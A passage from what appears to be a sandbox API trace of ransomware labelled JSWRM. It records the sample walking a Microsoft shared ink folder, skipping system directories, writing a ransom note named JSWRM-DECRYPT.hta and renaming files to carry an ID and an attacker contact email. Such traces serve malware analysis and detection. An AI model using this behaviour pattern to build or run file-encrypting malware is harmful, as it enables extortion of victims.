(lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0068.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.562] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9592f9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e9592f9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e9592f9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.562] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0068.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0068.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.562] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1efc60fe, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1efc60fe, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1efc60fe, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.562] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.562] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.562] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.562] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.562] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.562] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.563] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.563] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.563] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.563] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.563] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0068.563] lstrcmpiW (lpString1="ko-KR", lpString2=".") returned 1 [0068.563] lstrcmpiW (lpString1="ko-KR", lpString2="..") returned 1 [0068.563] lstrcmpiW (lpString1="ko-KR", lpString2="...") returned 1 [0068.563] lstrcmpiW (lpString1="ko-KR", lpString2="windows") returned -1 [0068.563] lstrcmpiW (lpString1="ko-KR", lpString2="recovery") returned -1 [0068.563] lstrcmpiW (lpString1="ko-KR", lpString2="perflogs") returned -1 [0068.563] lstrcmpiW (lpString1="ko-KR", lpString2="documents and settings") returned 1 [0068.563] lstrcmpiW (lpString1="ko-KR", lpString2="$RECYCLE.BIN") returned 1 [0068.563] lstrcmpiW (lpString1="ko-KR", lpString2="system volume information") returned -1 [0068.563] lstrcmpiW (lpString1="ko-KR", lpString2="msocache") returned -1 [0068.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0068.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0068.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\jswrm-decrypt.hta")) returned 0xffffffff [0068.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.564] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.564] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.565] CloseHandle (hObject=0x454) returned 1 [0068.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\jswrm-decrypt.hta")) returned 0x20 [0068.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.566] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8637ee, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0068.566] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.566] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8637ee, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.566] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.566] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.566] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8637ee, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f8637ee, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f8899a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.566] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.566] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.566] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.566] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.566] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.566] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.567] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0068.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.567] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.567] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.567] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.567] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.567] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.567] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.567] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.567] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.567] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.567] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.567] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0068.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0068.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.568] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.568] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10083861658851952) returned 0 [0068.568] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.568] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.568] CloseHandle (hObject=0xffffffff) returned 1 [0068.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0068.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0068.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0068.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.569] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0068.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.569] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.569] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0068.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0068.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.569] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="LanguageModel", cAlternateFileName="LANGUA~1")) returned 1 [0068.569] lstrcmpiW (lpString1="LanguageModel", lpString2=".") returned 1 [0068.569] lstrcmpiW (lpString1="LanguageModel", lpString2="..") returned 1 [0068.569] lstrcmpiW (lpString1="LanguageModel", lpString2="...") returned 1 [0068.569] lstrcmpiW (lpString1="LanguageModel", lpString2="windows") returned -1 [0068.569] lstrcmpiW 